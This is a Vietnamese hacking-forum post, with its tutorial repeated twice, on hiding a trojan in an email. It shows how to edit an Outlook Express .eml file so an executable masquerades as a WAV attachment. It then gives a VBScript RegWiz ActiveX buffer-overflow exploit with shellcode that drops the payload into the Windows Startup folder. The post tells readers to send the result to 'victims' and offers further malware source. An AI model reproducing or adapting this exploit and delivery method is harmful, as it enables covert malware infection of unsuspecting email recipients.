Search
Latest topics
Cách dính trojan vào mail và web
Page 1 of 1
Cách dính trojan vào mail và web
Buoc1:
Chung ta phai vao Internet Explorer -> Option -> Security Tab, nhan Custom Level, va tat (disable) tat ca chuc nang cho phep chay Script(Neu khong chinh may ban se bi nhiem)
Buoc2:
Chuan bi 1 con virus, trojan,backdoor, etc., 1 chuong trinh dung de Edit nhu EditPlus, TextPad.
Buoc3:
+Chay Outlook Express, nhan New Message ->Format->Background->Picures (or Sound) (vi du file ding.wav chang han)
+ Attach them 1 file trojan, hoac virus = nu't Attach (dat ten la file.exe chang han)
+ Save ca'i email na`y ra mot thu muc nao do' tren o cung.
Buoc4:
Dung EditPlus hoac TextPad, hoac 1 chuong trinh nao do dung de edit text, mo file *.eml nay ra. Trong phan source code cua file nay se co dong nhu sau:
Ban hay Cat dong sau:
Content-Disposition: attachment;
filename="file.exe"
- Va dan vao phan dinh dang file ding.wav, no se trong nhu sau:
Content-Type: audio/wav;
name="Ding.wav"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; {Chu thich: 2 dong duoi nay la dan vao thi no moi hien ra nhu vay}
filename="file.exe"
- Sau do vao phan dinh dang attachement ding.wav ta cat dong
Content-ID sau:
Content-ID: <002801bf41c9$95325940$0100007f@computername>
- dan no vao phan dinh dang cua attachement file.exe. No se trong giong nhu the nay:
Trích dẫn
Content-Type: application/x-msdownload;
name="file.exe"
Content-Transfer-Encoding: base64
Content-ID: <002801bf41c9$95325940$0100007f@computername>
- Sau do ban Save file *.eml ban vua chinh sua nay. Roi chay no' , ban se thay o phan Attach file se xuat hien cai ten [file.exe], nhung thuc chat day khong phai la cai file trojan file.exe that su dau (ban hay nhin lai dung luong cua no', dung luong cua no'=dung luong cai file ding.wav day!)
Hay xoa (Remove) cai file.exe di bang cach nhan chuot phai vao no', chon Remove.
- Bay gio ban vao phan View hoac nhan Alt + V, danh dau vao phan Source Edit. Ban se thay OE hien len 3 nut Edit, Source, Preview o cuoi phia duoi buc thu, va ban dang o phan Edit, hay nhan chuot vao phan Source roi dan doan script sau vao:
Trích dẫn
<object classid="clsid:50E5E3D1-C07E-11D0-B9FD-00A0249F6B00"
id="RegWizObj"></object>
<script language="VbScript" >
expstr = "/i
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
expstr = expstr & Chr(235)
expstr = expstr & Chr(53)
expstr = expstr & Chr(208)
expstr = expstr & Chr(127)
expstr = expstr + Chr(144)
expstr = expstr + Chr(139) + Chr(252)
expstr = expstr + Chr(131) + Chr(199) + Chr(25)
expstr = expstr + Chr(80)
expstr = expstr + Chr(87)
expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) + Chr(191)
expstr = expstr + Chr(255) + Chr(210)
expstr = expstr + Chr(51) + Chr(192)
expstr = expstr + Chr(80)
expstr = expstr + Chr(186) + Chr(202) + Chr(212) + Chr(248) +
Chr(191)
expstr = expstr + Chr(255) + Chr(210)
expstr = expstr + "move c:\windows\temp\d*.tmp
c:\windows\startm~1\programs\startup\file.exe"
RegWizObj.InvokeRegWizard(expstr)
</script>
- Save su thay doi vua roi lai. The la xong, ban co the gui no' di cho cac victim duoc roi day.
Neu cac ban thay rac roi thi hay gui email den cho toi, toi se send cho cac ban cai source code cua Badblood, ban chi can them email cua nan nhan, subject va dinh kem file la hoan thanh cong viec.
Chung ta phai vao Internet Explorer -> Option -> Security Tab, nhan Custom Level, va tat (disable) tat ca chuc nang cho phep chay Script(Neu khong chinh may ban se bi nhiem)
Buoc2:
Chuan bi 1 con virus, trojan,backdoor, etc., 1 chuong trinh dung de Edit nhu EditPlus, TextPad.
Buoc3:
+Chay Outlook Express, nhan New Message ->Format->Background->Picures (or Sound) (vi du file ding.wav chang han)
+ Attach them 1 file trojan, hoac virus = nu't Attach (dat ten la file.exe chang han)
+ Save ca'i email na`y ra mot thu muc nao do' tren o cung.
Buoc4:
Dung EditPlus hoac TextPad, hoac 1 chuong trinh nao do dung de edit text, mo file *.eml nay ra. Trong phan source code cua file nay se co dong nhu sau:
Ban hay Cat dong sau:
Content-Disposition: attachment;
filename="file.exe"
- Va dan vao phan dinh dang file ding.wav, no se trong nhu sau:
Content-Type: audio/wav;
name="Ding.wav"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; {Chu thich: 2 dong duoi nay la dan vao thi no moi hien ra nhu vay}
filename="file.exe"
- Sau do vao phan dinh dang attachement ding.wav ta cat dong
Content-ID sau:
Content-ID: <002801bf41c9$95325940$0100007f@computername>
- dan no vao phan dinh dang cua attachement file.exe. No se trong giong nhu the nay:
Trích dẫn
Content-Type: application/x-msdownload;
name="file.exe"
Content-Transfer-Encoding: base64
Content-ID: <002801bf41c9$95325940$0100007f@computername>
- Sau do ban Save file *.eml ban vua chinh sua nay. Roi chay no' , ban se thay o phan Attach file se xuat hien cai ten [file.exe], nhung thuc chat day khong phai la cai file trojan file.exe that su dau (ban hay nhin lai dung luong cua no', dung luong cua no'=dung luong cai file ding.wav day!)
Hay xoa (Remove) cai file.exe di bang cach nhan chuot phai vao no', chon Remove.
- Bay gio ban vao phan View hoac nhan Alt + V, danh dau vao phan Source Edit. Ban se thay OE hien len 3 nut Edit, Source, Preview o cuoi phia duoi buc thu, va ban dang o phan Edit, hay nhan chuot vao phan Source roi dan doan script sau vao:
Trích dẫn
<object classid="clsid:50E5E3D1-C07E-11D0-B9FD-00A0249F6B00"
id="RegWizObj"></object>
<script language="VbScript" >
expstr = "/i
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
expstr = expstr & Chr(235)
expstr = expstr & Chr(53)
expstr = expstr & Chr(208)
expstr = expstr & Chr(127)
expstr = expstr + Chr(144)
expstr = expstr + Chr(139) + Chr(252)
expstr = expstr + Chr(131) + Chr(199) + Chr(25)
expstr = expstr + Chr(80)
expstr = expstr + Chr(87)
expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) + Chr(191)
expstr = expstr + Chr(255) + Chr(210)
expstr = expstr + Chr(51) + Chr(192)
expstr = expstr + Chr(80)
expstr = expstr + Chr(186) + Chr(202) + Chr(212) + Chr(248) +
Chr(191)
expstr = expstr + Chr(255) + Chr(210)
expstr = expstr + "move c:\windows\temp\d*.tmp
c:\windows\startm~1\programs\startup\file.exe"
RegWizObj.InvokeRegWizard(expstr)
</script>
- Save su thay doi vua roi lai. The la xong, ban co the gui no' di cho cac victim duoc roi day.
Neu cac ban thay rac roi thi hay gui email den cho toi, toi se send cho cac ban cai source code cua Badblood, ban chi can them email cua nan nhan, subject va dinh kem file la hoan thanh cong viec.
Similar topics
» Cách đính kèm trojan vào website
» Hướng dẫn sử dụng Trojan B-S1.91
» Cách phòng chống Trojan hữu hiệu
» Cách phòng chống Trojan hữu hiệu
» Hướng dẫn sử dụng Trojan Hooker :
» Hướng dẫn sử dụng Trojan B-S1.91
» Cách phòng chống Trojan hữu hiệu
» Cách phòng chống Trojan hữu hiệu
» Hướng dẫn sử dụng Trojan Hooker :
Page 1 of 1
Permissions in this forum:
You cannot reply to topics in this forum
Thu Aug 23, 2012 5:38 am by Admin
» Tuyệt kỹ cua giai
Thu Aug 23, 2012 5:36 am by Admin
» NETCAT.........
Mon Aug 13, 2012 6:35 am by Admin
» Bảo mật CSDL bằng phương pháp mã hóa.
Tue Apr 17, 2012 10:04 pm by Admin
» Hàm mã hóa MD5 bằng JavaScript
Tue Apr 17, 2012 10:03 pm by Admin
» Giá của món quà
Fri Apr 13, 2012 6:01 am by Admin
» Sẽ chỉ yêu ai?
Fri Apr 13, 2012 6:01 am by Admin
» Cách đọc bảng chữ cái!
Thu Apr 12, 2012 10:37 pm by Admin
» Gắn trojan, keylog, virus vào website, forum
Tue Apr 10, 2012 1:14 am by Admin